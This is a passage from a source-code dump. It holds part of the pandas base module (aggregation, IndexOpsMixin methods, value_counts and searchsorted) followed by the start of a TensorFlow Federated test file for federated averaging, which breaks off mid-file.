object\n elif self._selection is not None:\n\n sl = set(self._selection_list)\n\n # we are a Series like object,\n # but may have multiple aggregations\n if len(sl) == 1:\n\n result = _agg(\n arg, lambda fname, agg_how: _agg_1dim(self._selection, agg_how)\n )\n\n # we are selecting the same set as we are aggregating\n elif not len(sl - set(keys)):\n\n result = _agg(arg, _agg_1dim)\n\n # we are a DataFrame, with possibly multiple aggregations\n else:\n\n result = _agg(arg, _agg_2dim)\n\n # no selection\n else:\n\n try:\n result = _agg(arg, _agg_1dim)\n except SpecificationError:\n\n # we are aggregating expecting all 1d-returns\n # but we have 2d\n result = _agg(arg, _agg_2dim)\n\n # combine results\n\n def is_any_series():\n # return a boolean if we have *any* nested series\n return any(isinstance(r, ABCSeries) for r in result.values())\n\n def is_any_frame():\n # return a boolean if we have *any* nested series\n return any(isinstance(r, ABCDataFrame) for r in result.values())\n\n if isinstance(result, list):\n return concat(result, keys=keys, axis=1, sort=True), True\n\n elif is_any_frame():\n # we have a dict of DataFrames\n # return a MI DataFrame\n\n return concat([result[k] for k in keys], keys=keys, axis=1), True\n\n elif isinstance(self, ABCSeries) and is_any_series():\n\n # we have a dict of Series\n # return a MI Series\n try:\n result = concat(result)\n except TypeError:\n # we want to give a nice error here if\n # we have non-same sized objects, so\n # we don't automatically broadcast\n\n raise ValueError(\n \"cannot perform both aggregation \"\n \"and transformation operations \"\n \"simultaneously\"\n )\n\n return result, True\n\n # fall thru\n from pandas import DataFrame, Series\n\n try:\n result = DataFrame(result)\n except ValueError:\n\n # we have a dict of scalars\n result = Series(result, name=getattr(self, \"name\", None))\n\n return result, True\n elif is_list_like(arg):\n # we require a list, but not an 'str'\n return self._aggregate_multiple_funcs(arg, _level=_level, _axis=_axis), None\n else:\n result = None\n\n f = self._get_cython_func(arg)\n if f and not args and not kwargs:\n return getattr(self, f)(), None\n\n # caller can react\n return result, True\n\n def _aggregate_multiple_funcs(self, arg, _level, _axis):\n from pandas.core.reshape.concat import concat\n\n if _axis != 0:\n raise NotImplementedError(\"axis other than 0 is not supported\")\n\n if self._selected_obj.ndim == 1:\n obj = self._selected_obj\n else:\n obj = self._obj_with_exclusions\n\n results = []\n keys = []\n\n # degenerate case\n if obj.ndim == 1:\n for a in arg:\n colg = self._gotitem(obj.name, ndim=1, subset=obj)\n try:\n new_res = colg.aggregate(a)\n\n except (TypeError, DataError):\n pass\n else:\n results.append(new_res)\n\n # make sure we find a good name\n name = com.get_callable_name(a) or a\n keys.append(name)\n\n # multiples\n else:\n for index, col in enumerate(obj):\n colg = self._gotitem(col, ndim=1, subset=obj.iloc[:, index])\n try:\n new_res = colg.aggregate(arg)\n except (TypeError, DataError):\n pass\n except ValueError as err:\n # cannot aggregate\n if \"Must produce aggregated value\" in str(err):\n # raised directly in _aggregate_named\n pass\n elif \"no results\" in str(err):\n # raised direcly in _aggregate_multiple_funcs\n pass\n else:\n raise\n else:\n results.append(new_res)\n keys.append(col)\n\n # if we are empty\n if not len(results):\n raise ValueError(\"no results\")\n\n try:\n return concat(results, keys=keys, axis=1, sort=False)\n except TypeError:\n\n # we are concatting non-NDFrame objects,\n # e.g. a list of scalars\n\n from pandas import Series\n\n result = Series(results, index=keys, name=self.name)\n if is_nested_object(result):\n raise ValueError(\"cannot combine transform and aggregation operations\")\n return result\n\n def _shallow_copy(self, obj=None, obj_type=None, **kwargs):\n \"\"\"\n return a new object with the replacement attributes\n \"\"\"\n if obj is None:\n obj = self._selected_obj.copy()\n if obj_type is None:\n obj_type = self._constructor\n if isinstance(obj, obj_type):\n obj = obj.obj\n for attr in self._attributes:\n if attr not in kwargs:\n kwargs[attr] = getattr(self, attr)\n return obj_type(obj, **kwargs)\n\n def _get_cython_func(self, arg: str) -> Optional[str]:\n \"\"\"\n if we define an internal function for this argument, return it\n \"\"\"\n return self._cython_table.get(arg)\n\n def _is_builtin_func(self, arg):\n \"\"\"\n if we define an builtin function for this argument, return it,\n otherwise return the arg\n \"\"\"\n return self._builtin_table.get(arg, arg)\n\n\nclass IndexOpsMixin:\n \"\"\"\n Common ops mixin to support a unified interface / docs for Series / Index\n \"\"\"\n\n # ndarray compatibility\n __array_priority__ = 1000\n _deprecations = frozenset(\n [\n \"tolist\", # tolist is not deprecated, just suppressed in the __dir__\n \"base\",\n \"data\",\n \"item\",\n \"itemsize\",\n \"flags\",\n \"strides\",\n ]\n ) # type: FrozenSet[str]\n\n def transpose(self, *args, **kwargs):\n \"\"\"\n Return the transpose, which is by definition self.\n\n Returns\n -------\n %(klass)s\n \"\"\"\n nv.validate_transpose(args, kwargs)\n return self\n\n T = property(\n transpose,\n doc=\"\"\"\n Return the transpose, which is by definition self.\n \"\"\",\n )\n\n @property\n def _is_homogeneous_type(self):\n \"\"\"\n Whether the object has a single dtype.\n\n By definition, Series and Index are always considered homogeneous.\n A MultiIndex may or may not be homogeneous, depending on the\n dtypes of the levels.\n\n See Also\n --------\n DataFrame._is_homogeneous_type : Whether all the columns in a\n DataFrame have the same dtype.\n MultiIndex._is_homogeneous_type : Whether all the levels of a\n MultiIndex have the same dtype.\n \"\"\"\n return True\n\n @property\n def shape(self):\n \"\"\"\n Return a tuple of the shape of the underlying data.\n \"\"\"\n return self._values.shape\n\n @property\n def ndim(self):\n \"\"\"\n Number of dimensions of the underlying data, by definition 1.\n \"\"\"\n return 1\n\n def item(self):\n \"\"\"\n Return the first element of the underlying data as a python scalar.\n\n .. deprecated:: 0.25.0\n\n Returns\n -------\n scalar\n The first element of %(klass)s.\n \"\"\"\n warnings.warn(\n \"`item` has been deprecated and will be removed in a future version\",\n FutureWarning,\n stacklevel=2,\n )\n return self.values.item()\n\n @property\n def data(self):\n \"\"\"\n Return the data pointer of the underlying data.\n\n .. deprecated:: 0.23.0\n \"\"\"\n warnings.warn(\n \"{obj}.data is deprecated and will be removed \"\n \"in a future version\".format(obj=type(self).__name__),\n FutureWarning,\n stacklevel=2,\n )\n return self.values.data\n\n @property\n def itemsize(self):\n \"\"\"\n Return the size of the dtype of the item of the underlying data.\n\n .. deprecated:: 0.23.0\n \"\"\"\n warnings.warn(\n \"{obj}.itemsize is deprecated and will be removed \"\n \"in a future version\".format(obj=type(self).__name__),\n FutureWarning,\n stacklevel=2,\n )\n return self._ndarray_values.itemsize\n\n @property\n def nbytes(self):\n \"\"\"\n Return the number of bytes in the underlying data.\n \"\"\"\n return self._values.nbytes\n\n @property\n def strides(self):\n \"\"\"\n Return the strides of the underlying data.\n\n .. deprecated:: 0.23.0\n \"\"\"\n warnings.warn(\n \"{obj}.strides is deprecated and will be removed \"\n \"in a future version\".format(obj=type(self).__name__),\n FutureWarning,\n stacklevel=2,\n )\n return self._ndarray_values.strides\n\n @property\n def size(self):\n \"\"\"\n Return the number of elements in the underlying data.\n \"\"\"\n return len(self._values)\n\n @property\n def flags(self):\n \"\"\"\n Return the ndarray.flags for the underlying data.\n\n .. deprecated:: 0.23.0\n \"\"\"\n warnings.warn(\n \"{obj}.flags is deprecated and will be removed \"\n \"in a future version\".format(obj=type(self).__name__),\n FutureWarning,\n stacklevel=2,\n )\n return self.values.flags\n\n @property\n def base(self):\n \"\"\"\n Return the base object if the memory of the underlying data is shared.\n\n .. deprecated:: 0.23.0\n \"\"\"\n warnings.warn(\n \"{obj}.base is deprecated and will be removed \"\n \"in a future version\".format(obj=type(self).__name__),\n FutureWarning,\n stacklevel=2,\n )\n return self.values.base\n\n @property\n def array(self) -> ExtensionArray:\n \"\"\"\n The ExtensionArray of the data backing this Series or Index.\n\n .. versionadded:: 0.24.0\n\n Returns\n -------\n ExtensionArray\n An ExtensionArray of the values stored within. For extension\n types, this is the actual array. For NumPy native types, this\n is a thin (no copy) wrapper around :class:`numpy.ndarray`.\n\n ``.array`` differs ``.values`` which may require converting the\n data to a different form.\n\n See Also\n --------\n Index.to_numpy : Similar method that always returns a NumPy array.\n Series.to_numpy : Similar method that always returns a NumPy array.\n\n Notes\n -----\n This table lays out the different array types for each extension\n dtype within pandas.\n\n ================== =============================\n dtype array type\n ================== =============================\n category Categorical\n period PeriodArray\n interval IntervalArray\n IntegerNA IntegerArray\n datetime64[ns, tz] DatetimeArray\n ================== =============================\n\n For any 3rd-party extension types, the array type will be an\n ExtensionArray.\n\n For all remaining dtypes ``.array`` will be a\n :class:`arrays.NumpyExtensionArray` wrapping the actual ndarray\n stored within. If you absolutely need a NumPy array (possibly with\n copying / coercing data), then use :meth:`Series.to_numpy` instead.\n\n Examples\n --------\n\n For regular NumPy types like int, and float, a PandasArray\n is returned.\n\n >>> pd.Series([1, 2, 3]).array\n \n [1, 2, 3]\n Length: 3, dtype: int64\n\n For extension types, like Categorical, the actual ExtensionArray\n is returned\n\n >>> ser = pd.Series(pd.Categorical(['a', 'b', 'a']))\n >>> ser.array\n [a, b, a]\n Categories (2, object): [a, b]\n \"\"\"\n # As a mixin, we depend on the mixing class having _values.\n # Special mixin syntax may be developed in the future:\n # https://github.com/python/typing/issues/246\n result = self._values # type: ignore\n\n if is_datetime64_ns_dtype(result.dtype):\n from pandas.arrays import DatetimeArray\n\n result = DatetimeArray(result)\n elif is_timedelta64_ns_dtype(result.dtype):\n from pandas.arrays import TimedeltaArray\n\n result = TimedeltaArray(result)\n\n elif not is_extension_array_dtype(result.dtype):\n from pandas.core.arrays.numpy_ import PandasArray\n\n result = PandasArray(result)\n\n return result\n\n def to_numpy(self, dtype=None, copy=False):\n \"\"\"\n A NumPy ndarray representing the values in this Series or Index.\n\n .. versionadded:: 0.24.0\n\n Parameters\n ----------\n dtype : str or numpy.dtype, optional\n The dtype to pass to :meth:`numpy.asarray`.\n copy : bool, default False\n Whether to ensure that the returned value is a not a view on\n another array. Note that ``copy=False`` does not *ensure* that\n ``to_numpy()`` is no-copy. Rather, ``copy=True`` ensure that\n a copy is made, even if not strictly necessary.\n\n Returns\n -------\n numpy.ndarray\n\n See Also\n --------\n Series.array : Get the actual data stored within.\n Index.array : Get the actual data stored within.\n DataFrame.to_numpy : Similar method for DataFrame.\n\n Notes\n -----\n The returned array will be the same up to equality (values equal\n in `self` will be equal in the returned array; likewise for values\n that are not equal). When `self` contains an ExtensionArray, the\n dtype may be different. For example, for a category-dtype Series,\n ``to_numpy()`` will return a NumPy array and the categorical dtype\n will be lost.\n\n For NumPy dtypes, this will be a reference to the actual data stored\n in this Series or Index (assuming ``copy=False``). Modifying the result\n in place will modify the data stored in the Series or Index (not that\n we recommend doing that).\n\n For extension types, ``to_numpy()`` *may* require copying data and\n coercing the result to a NumPy type (possibly object), which may be\n expensive. When you need a no-copy reference to the underlying data,\n :attr:`Series.array` should be used instead.\n\n This table lays out the different dtypes and default return types of\n ``to_numpy()`` for various dtypes within pandas.\n\n ================== ================================\n dtype array type\n ================== ================================\n category[T] ndarray[T] (same dtype as input)\n period ndarray[object] (Periods)\n interval ndarray[object] (Intervals)\n IntegerNA ndarray[object]\n datetime64[ns] datetime64[ns]\n datetime64[ns, tz] ndarray[object] (Timestamps)\n ================== ================================\n\n Examples\n --------\n >>> ser = pd.Series(pd.Categorical(['a', 'b', 'a']))\n >>> ser.to_numpy()\n array(['a', 'b', 'a'], dtype=object)\n\n Specify the `dtype` to control how datetime-aware data is represented.\n Use ``dtype=object`` to return an ndarray of pandas :class:`Timestamp`\n objects, each with the correct ``tz``.\n\n >>> ser = pd.Series(pd.date_range('2000', periods=2, tz=\"CET\"))\n >>> ser.to_numpy(dtype=object)\n array([Timestamp('2000-01-01 00:00:00+0100', tz='CET', freq='D'),\n Timestamp('2000-01-02 00:00:00+0100', tz='CET', freq='D')],\n dtype=object)\n\n Or ``dtype='datetime64[ns]'`` to return an ndarray of native\n datetime64 values. The values are converted to UTC and the timezone\n info is dropped.\n\n >>> ser.to_numpy(dtype=\"datetime64[ns]\")\n ... # doctest: +ELLIPSIS\n array(['1999-12-31T23:00:00.000000000', '2000-01-01T23:00:00...'],\n dtype='datetime64[ns]')\n \"\"\"\n if is_datetime64tz_dtype(self.dtype) and dtype is None:\n # note: this is going to change very soon.\n # I have a WIP PR making this unnecessary, but it's\n # a bit out of scope for the DatetimeArray PR.\n dtype = \"object\"\n\n result = np.asarray(self._values, dtype=dtype)\n # TODO(GH-24345): Avoid potential double copy\n if copy:\n result = result.copy()\n return result\n\n @property\n def _ndarray_values(self) -> np.ndarray:\n \"\"\"\n The data as an ndarray, possibly losing information.\n\n The expectation is that this is cheap to compute, and is primarily\n used for interacting with our indexers.\n\n - categorical -> codes\n \"\"\"\n if is_extension_array_dtype(self):\n return self.array._ndarray_values\n # As a mixin, we depend on the mixing class having values.\n # Special mixin syntax may be developed in the future:\n # https://github.com/python/typing/issues/246\n return self.values # type: ignore\n\n @property\n def empty(self):\n return not self.size\n\n def max(self, axis=None, skipna=True, *args, **kwargs):\n \"\"\"\n Return the maximum value of the Index.\n\n Parameters\n ----------\n axis : int, optional\n For compatibility with NumPy. Only 0 or None are allowed.\n skipna : bool, default True\n\n Returns\n -------\n scalar\n Maximum value.\n\n See Also\n --------\n Index.min : Return the minimum value in an Index.\n Series.max : Return the maximum value in a Series.\n DataFrame.max : Return the maximum values in a DataFrame.\n\n Examples\n --------\n >>> idx = pd.Index([3, 2, 1])\n >>> idx.max()\n 3\n\n >>> idx = pd.Index(['c', 'b', 'a'])\n >>> idx.max()\n 'c'\n\n For a MultiIndex, the maximum is determined lexicographically.\n\n >>> idx = pd.MultiIndex.from_product([('a', 'b'), (2, 1)])\n >>> idx.max()\n ('b', 2)\n \"\"\"\n nv.validate_minmax_axis(axis)\n nv.validate_max(args, kwargs)\n return nanops.nanmax(self._values, skipna=skipna)\n\n def argmax(self, axis=None, skipna=True, *args, **kwargs):\n \"\"\"\n Return an ndarray of the maximum argument indexer.\n\n Parameters\n ----------\n axis : {None}\n Dummy argument for consistency with Series.\n skipna : bool, default True\n\n Returns\n -------\n numpy.ndarray\n Indices of the maximum values.\n\n See Also\n --------\n numpy.ndarray.argmax\n \"\"\"\n nv.validate_minmax_axis(axis)\n nv.validate_argmax_with_skipna(skipna, args, kwargs)\n return nanops.nanargmax(self._values, skipna=skipna)\n\n def min(self, axis=None, skipna=True, *args, **kwargs):\n \"\"\"\n Return the minimum value of the Index.\n\n Parameters\n ----------\n axis : {None}\n Dummy argument for consistency with Series.\n skipna : bool, default True\n\n Returns\n -------\n scalar\n Minimum value.\n\n See Also\n --------\n Index.max : Return the maximum value of the object.\n Series.min : Return the minimum value in a Series.\n DataFrame.min : Return the minimum values in a DataFrame.\n\n Examples\n --------\n >>> idx = pd.Index([3, 2, 1])\n >>> idx.min()\n 1\n\n >>> idx = pd.Index(['c', 'b', 'a'])\n >>> idx.min()\n 'a'\n\n For a MultiIndex, the minimum is determined lexicographically.\n\n >>> idx = pd.MultiIndex.from_product([('a', 'b'), (2, 1)])\n >>> idx.min()\n ('a', 1)\n \"\"\"\n nv.validate_minmax_axis(axis)\n nv.validate_min(args, kwargs)\n return nanops.nanmin(self._values, skipna=skipna)\n\n def argmin(self, axis=None, skipna=True, *args, **kwargs):\n \"\"\"\n Return a ndarray of the minimum argument indexer.\n\n Parameters\n ----------\n axis : {None}\n Dummy argument for consistency with Series.\n skipna : bool, default True\n\n Returns\n -------\n numpy.ndarray\n\n See Also\n --------\n numpy.ndarray.argmin\n \"\"\"\n nv.validate_minmax_axis(axis)\n nv.validate_argmax_with_skipna(skipna, args, kwargs)\n return nanops.nanargmin(self._values, skipna=skipna)\n\n def tolist(self):\n \"\"\"\n Return a list of the values.\n\n These are each a scalar type, which is a Python scalar\n (for str, int, float) or a pandas scalar\n (for Timestamp/Timedelta/Interval/Period)\n\n Returns\n -------\n list\n\n See Also\n --------\n numpy.ndarray.tolist\n \"\"\"\n if is_datetimelike(self._values):\n return [com.maybe_box_datetimelike(x) for x in self._values]\n elif is_extension_array_dtype(self._values):\n return list(self._values)\n else:\n return self._values.tolist()\n\n to_list = tolist\n\n def __iter__(self):\n \"\"\"\n Return an iterator of the values.\n\n These are each a scalar type, which is a Python scalar\n (for str, int, float) or a pandas scalar\n (for Timestamp/Timedelta/Interval/Period)\n\n Returns\n -------\n iterator\n \"\"\"\n # We are explicitly making element iterators.\n if is_datetimelike(self._values):\n return map(com.maybe_box_datetimelike, self._values)\n elif is_extension_array_dtype(self._values):\n return iter(self._values)\n else:\n return map(self._values.item, range(self._values.size))\n\n @cache_readonly\n def hasnans(self):\n \"\"\"\n Return if I have any nans; enables various perf speedups.\n \"\"\"\n return bool(isna(self).any())\n\n def _reduce(\n self, op, name, axis=0, skipna=True, numeric_only=None, filter_type=None, **kwds\n ):\n \"\"\" perform the reduction type operation if we can \"\"\"\n func = getattr(self, name, None)\n if func is None:\n raise TypeError(\n \"{klass} cannot perform the operation {op}\".format(\n klass=self.__class__.__name__, op=name\n )\n )\n return func(skipna=skipna, **kwds)\n\n def _map_values(self, mapper, na_action=None):\n \"\"\"\n An internal function that maps values using the input\n correspondence (which can be a dict, Series, or function).\n\n Parameters\n ----------\n mapper : function, dict, or Series\n The input correspondence object\n na_action : {None, 'ignore'}\n If 'ignore', propagate NA values, without passing them to the\n mapping function\n\n Returns\n -------\n Union[Index, MultiIndex], inferred\n The output of the mapping function applied to the index.\n If the function returns a tuple with more than one element\n a MultiIndex will be returned.\n\n \"\"\"\n\n # we can fastpath dict/Series to an efficient map\n # as we know that we are not going to have to yield\n # python types\n if isinstance(mapper, dict):\n if hasattr(mapper, \"__missing__\"):\n # If a dictionary subclass defines a default value method,\n # convert mapper to a lookup function (GH #15999).\n dict_with_default = mapper\n mapper = lambda x: dict_with_default[x]\n else:\n # Dictionary does not have a default. Thus it's safe to\n # convert to an Series for efficiency.\n # we specify the keys here to handle the\n # possibility that they are tuples\n from pandas import Series\n\n mapper = Series(mapper)\n\n if isinstance(mapper, ABCSeries):\n # Since values were input this means we came from either\n # a dict or a series and mapper should be an index\n if is_categorical_dtype(self._values):\n # use the built in categorical series mapper which saves\n # time by mapping the categories instead of all values\n return self._values.map(mapper)\n if is_extension_type(self.dtype):\n values = self._values\n else:\n values = self.values\n\n indexer = mapper.index.get_indexer(values)\n new_values = algorithms.take_1d(mapper._values, indexer)\n\n return new_values\n\n # we must convert to python types\n if is_extension_type(self.dtype):\n values = self._values\n if na_action is not None:\n raise NotImplementedError\n map_f = lambda values, f: values.map(f)\n else:\n values = self.astype(object)\n values = getattr(values, \"values\", values)\n if na_action == \"ignore\":\n\n def map_f(values, f):\n return lib.map_infer_mask(values, f, isna(values).view(np.uint8))\n\n else:\n map_f = lib.map_infer\n\n # mapper is a function\n new_values = map_f(values, mapper)\n\n return new_values\n\n def value_counts(\n self, normalize=False, sort=True, ascending=False, bins=None, dropna=True\n ):\n \"\"\"\n Return a Series containing counts of unique values.\n\n The resulting object will be in descending order so that the\n first element is the most frequently-occurring element.\n Excludes NA values by default.\n\n Parameters\n ----------\n normalize : bool, default False\n If True then the object returned will contain the relative\n frequencies of the unique values.\n sort : bool, default True\n Sort by frequencies.\n ascending : bool, default False\n Sort in ascending order.\n bins : int, optional\n Rather than count values, group them into half-open bins,\n a convenience for ``pd.cut``, only works with numeric data.\n dropna : bool, default True\n Don't include counts of NaN.\n\n Returns\n -------\n Series\n\n See Also\n --------\n Series.count: Number of non-NA elements in a Series.\n DataFrame.count: Number of non-NA elements in a DataFrame.\n\n Examples\n --------\n >>> index = pd.Index([3, 1, 2, 3, 4, np.nan])\n >>> index.value_counts()\n 3.0 2\n 4.0 1\n 2.0 1\n 1.0 1\n dtype: int64\n\n With `normalize` set to `True`, returns the relative frequency by\n dividing all values by the sum of values.\n\n >>> s = pd.Series([3, 1, 2, 3, 4, np.nan])\n >>> s.value_counts(normalize=True)\n 3.0 0.4\n 4.0 0.2\n 2.0 0.2\n 1.0 0.2\n dtype: float64\n\n **bins**\n\n Bins can be useful for going from a continuous variable to a\n categorical variable; instead of counting unique\n apparitions of values, divide the index in the specified\n number of half-open bins.\n\n >>> s.value_counts(bins=3)\n (2.0, 3.0] 2\n (0.996, 2.0] 2\n (3.0, 4.0] 1\n dtype: int64\n\n **dropna**\n\n With `dropna` set to `False` we can also see NaN index values.\n\n >>> s.value_counts(dropna=False)\n 3.0 2\n NaN 1\n 4.0 1\n 2.0 1\n 1.0 1\n dtype: int64\n \"\"\"\n result = value_counts(\n self,\n sort=sort,\n ascending=ascending,\n normalize=normalize,\n bins=bins,\n dropna=dropna,\n )\n return result\n\n def unique(self):\n values = self._values\n\n if hasattr(values, \"unique\"):\n\n result = values.unique()\n else:\n result = unique1d(values)\n\n return result\n\n def nunique(self, dropna=True):\n \"\"\"\n Return number of unique elements in the object.\n\n Excludes NA values by default.\n\n Parameters\n ----------\n dropna : bool, default True\n Don't include NaN in the count.\n\n Returns\n -------\n int\n\n See Also\n --------\n DataFrame.nunique: Method nunique for DataFrame.\n Series.count: Count non-NA/null observations in the Series.\n\n Examples\n --------\n >>> s = pd.Series([1, 3, 5, 7, 7])\n >>> s\n 0 1\n 1 3\n 2 5\n 3 7\n 4 7\n dtype: int64\n\n >>> s.nunique()\n 4\n \"\"\"\n uniqs = self.unique()\n n = len(uniqs)\n if dropna and isna(uniqs).any():\n n -= 1\n return n\n\n @property\n def is_unique(self):\n \"\"\"\n Return boolean if values in the object are unique.\n\n Returns\n -------\n bool\n \"\"\"\n return self.nunique(dropna=False) == len(self)\n\n @property\n def is_monotonic(self):\n \"\"\"\n Return boolean if values in the object are\n monotonic_increasing.\n\n Returns\n -------\n bool\n \"\"\"\n from pandas import Index\n\n return Index(self).is_monotonic\n\n is_monotonic_increasing = is_monotonic\n\n @property\n def is_monotonic_decreasing(self):\n \"\"\"\n Return boolean if values in the object are\n monotonic_decreasing.\n\n Returns\n -------\n bool\n \"\"\"\n from pandas import Index\n\n return Index(self).is_monotonic_decreasing\n\n def memory_usage(self, deep=False):\n \"\"\"\n Memory usage of the values.\n\n Parameters\n ----------\n deep : bool\n Introspect the data deeply, interrogate\n `object` dtypes for system-level memory consumption.\n\n Returns\n -------\n bytes used\n\n See Also\n --------\n numpy.ndarray.nbytes\n\n Notes\n -----\n Memory usage does not include memory consumed by elements that\n are not components of the array if deep=False or if used on PyPy\n \"\"\"\n if hasattr(self.array, \"memory_usage\"):\n return self.array.memory_usage(deep=deep)\n\n v = self.array.nbytes\n if deep and is_object_dtype(self) and not PYPY:\n v += lib.memory_usage_of_objects(self.array)\n return v\n\n @Substitution(\n values=\"\",\n order=\"\",\n size_hint=\"\",\n sort=textwrap.dedent(\n \"\"\"\\\n sort : bool, default False\n Sort `uniques` and shuffle `labels` to maintain the\n relationship.\n \"\"\"\n ),\n )\n @Appender(algorithms._shared_docs[\"factorize\"])\n def factorize(self, sort=False, na_sentinel=-1):\n return algorithms.factorize(self, sort=sort, na_sentinel=na_sentinel)\n\n _shared_docs[\n \"searchsorted\"\n ] = \"\"\"\n Find indices where elements should be inserted to maintain order.\n\n Find the indices into a sorted %(klass)s `self` such that, if the\n corresponding elements in `value` were inserted before the indices,\n the order of `self` would be preserved.\n\n .. note::\n\n The %(klass)s *must* be monotonically sorted, otherwise\n wrong locations will likely be returned. Pandas does *not*\n check this for you.\n\n Parameters\n ----------\n value : array_like\n Values to insert into `self`.\n side : {'left', 'right'}, optional\n If 'left', the index of the first suitable location found is given.\n If 'right', return the last such index. If there is no suitable\n index, return either 0 or N (where N is the length of `self`).\n sorter : 1-D array_like, optional\n Optional array of integer indices that sort `self` into ascending\n order. They are typically the result of ``np.argsort``.\n\n Returns\n -------\n int or array of int\n A scalar or array of insertion points with the\n same shape as `value`.\n\n .. versionchanged:: 0.24.0\n If `value` is a scalar, an int is now always returned.\n Previously, scalar inputs returned an 1-item array for\n :class:`Series` and :class:`Categorical`.\n\n See Also\n --------\n sort_values\n numpy.searchsorted\n\n Notes\n -----\n Binary search is used to find the required insertion points.\n\n Examples\n --------\n\n >>> x = pd.Series([1, 2, 3])\n >>> x\n 0 1\n 1 2\n 2 3\n dtype: int64\n\n >>> x.searchsorted(4)\n 3\n\n >>> x.searchsorted([0, 4])\n array([0, 3])\n\n >>> x.searchsorted([1, 3], side='left')\n array([0, 2])\n\n >>> x.searchsorted([1, 3], side='right')\n array([1, 3])\n\n >>> x = pd.Categorical(['apple', 'bread', 'bread',\n 'cheese', 'milk'], ordered=True)\n [apple, bread, bread, cheese, milk]\n Categories (4, object): [apple < bread < cheese < milk]\n\n >>> x.searchsorted('bread')\n 1\n\n >>> x.searchsorted(['bread'], side='right')\n array([3])\n\n If the values are not monotonically sorted, wrong locations\n may be returned:\n\n >>> x = pd.Series([2, 1, 3])\n >>> x.searchsorted(1)\n 0 # wrong result, correct would be 1\n \"\"\"\n\n @Substitution(klass=\"Index\")\n @Appender(_shared_docs[\"searchsorted\"])\n def searchsorted(self, value, side=\"left\", sorter=None):\n return algorithms.searchsorted(self._values, value, side=side, sorter=sorter)\n\n def drop_duplicates(self, keep=\"first\", inplace=False):\n inplace = validate_bool_kwarg(inplace, \"inplace\")\n if isinstance(self, ABCIndexClass):\n if self.is_unique:\n return self._shallow_copy()\n\n duplicated = self.duplicated(keep=keep)\n result = self[np.logical_not(duplicated)]\n if inplace:\n return self._update_inplace(result)\n else:\n return result\n\n def duplicated(self, keep=\"first\"):\n if isinstance(self, ABCIndexClass):\n if self.is_unique:\n return np.zeros(len(self), dtype=np.bool)\n return duplicated(self, keep=keep)\n else:\n return self._constructor(\n duplicated(self, keep=keep), index=self.index\n ).__finalize__(self)\n\n # ----------------------------------------------------------------------\n # abstracts\n\n def _update_inplace(self, result, verify_is_copy=True, **kwargs):\n raise AbstractMethodError(self)\n"} {"ext": "py", "sha": "1a2f9090d50fcfe7a07ab9ca7cee5c030f101b59", "content": "# Lint as: python3\n# Copyright 2018, The TensorFlow Federated Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Tests for learning.federated_averaging.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport collections\n\nfrom absl.testing import parameterized\nimport numpy as np\nfrom six.moves import range\nimport tensorflow as tf\n\nfrom tensorflow_federated.python.common_libs import test\nfrom tensorflow_federated.python.learning import federated_averaging\nfrom tensorflow_federated.python.learning import keras_utils\nfrom tensorflow_federated.python.learning import model_examples\nfrom tensorflow_federated.python.learning import model_utils\n\n\nclass FederatedAveragingClientTest(test.TestCase, parameterized.TestCase):\n \"\"\"Tests of ClientFedAvg that use a common model and data.\"\"\"\n\n def dataset(self):\n # Create a dataset with 4 examples:\n dataset = tf.data.Dataset.from_tensor_slices(\n model_examples.TrainableLinearRegression.make_batch(\n x=[[0.0, 0.0], [1.0, 0.0], [2.0, 0.0], [3.0, 0.0]],\n y=[[0.0], [0.0], [1.0], [1.0]]))\n # Repeat the dataset 2 times with batches of 3 examples,\n # producing 3 minibatches (the last one with only 2 examples).\n # Note that `batch` is required for this dataset to be useable,\n # as it adds the batch dimension which is expected by the model.\n return dataset.repeat(2).batch(3)\n\n def model(self):\n return model_examples.TrainableLinearRegression(feature_dim=2)\n\n def initial_weights(self):\n return model_utils.ModelWeights(\n trainable={\n 'a': tf.constant([[0.0], [0.0]]),\n 'b': tf.constant(0.0)\n },\n non_trainable={'c': 0.0})\n\n @test.graph_mode_test\n def test_client_tf(self):\n model = self.model()\n dataset = self.dataset()\n client_tf = federated_averaging.ClientFedAvg(model)\n init_op = tf.group(\n model_utils.model_initializer(model),\n tf.compat.v1.initializers.variables(client_tf.variables),\n name='fedavg_initializer')\n client_outputs = client_tf(dataset, self.initial_weights())\n\n tf.compat.v1.get_default_graph().finalize()\n with self.session() as sess:\n sess.run(init_op)\n out = sess.run(client_outputs)\n\n # Both trainable parameters should have been updated,\n # and we don't return the non-trainable 'c'.\n self.assertCountEqual(['a', 'b'], list(out.weights_delta.keys()))\n self.assertGreater(np.linalg.norm(out.weights_delta['a']), 0.1)\n self.assertGreater(np.linalg.norm(out.weights_delta['b']), 0.1)\n self.assertEqual(out.weights_delta_weight, 8.0)\n self.assertEqual(out.optimizer_output['num_examples'], 8)\n self.assertEqual(out.optimizer_output['has_non_finite_delta'], 0)\n\n self.assertEqual(out.model_output['num_examples'], 8)\n self.assertEqual(out.model_output['num_batches'], 3)\n self.assertBetween(out.model_output['loss'],\n np.finfo(np.float32).eps, 10.0)\n\n def test_client_tf_custom_delta_weight(self):\n model = self.model()\n dataset = self.dataset()\n client_tf = federated_averaging.ClientFedAvg(\n model, client_weight_fn=lambda _: tf.constant(1.5))\n out = client_tf(dataset, self.initial_weights())\n self.assertEqual(self.evaluate(out.weights_delta_weight), 1.5)\n\n @parameterized.named_parameters(('_inf', np.inf), ('_nan', np.nan))\n def test_non_finite_aggregation(self, bad_value):\n model = self.model()\n dataset = self.dataset()\n client_tf = federated_averaging.ClientFedAvg(model)\n init_weights = self.initial_weights()\n init_weights.trainable['b'] = bad_value\n out = client_tf(dataset, init_weights)\n self.assertEqual(self.evaluate(out.weights_delta_weight), 0.0)\n self.assertAllClose(\n self.evaluate(out.weights_delta['a']), np.array([[0.0], [0.0]]))\n self.assertAllClose(self.evaluate(out.weights_delta['b']), 0.0)\n self.assertEqual(\n self.evaluate(out.optimizer_output['has_non_finite_delta']), 1)\n\n\nclass FederatedAveragingTffTest(test.TestCase, parameterized.TestCase):\n\n def test_orchestration_execute(self):\n iterative_process = federated_averaging.build_federated_averaging_process(\n model_fn=model_examples.TrainableLinearRegression)\n\n ds = 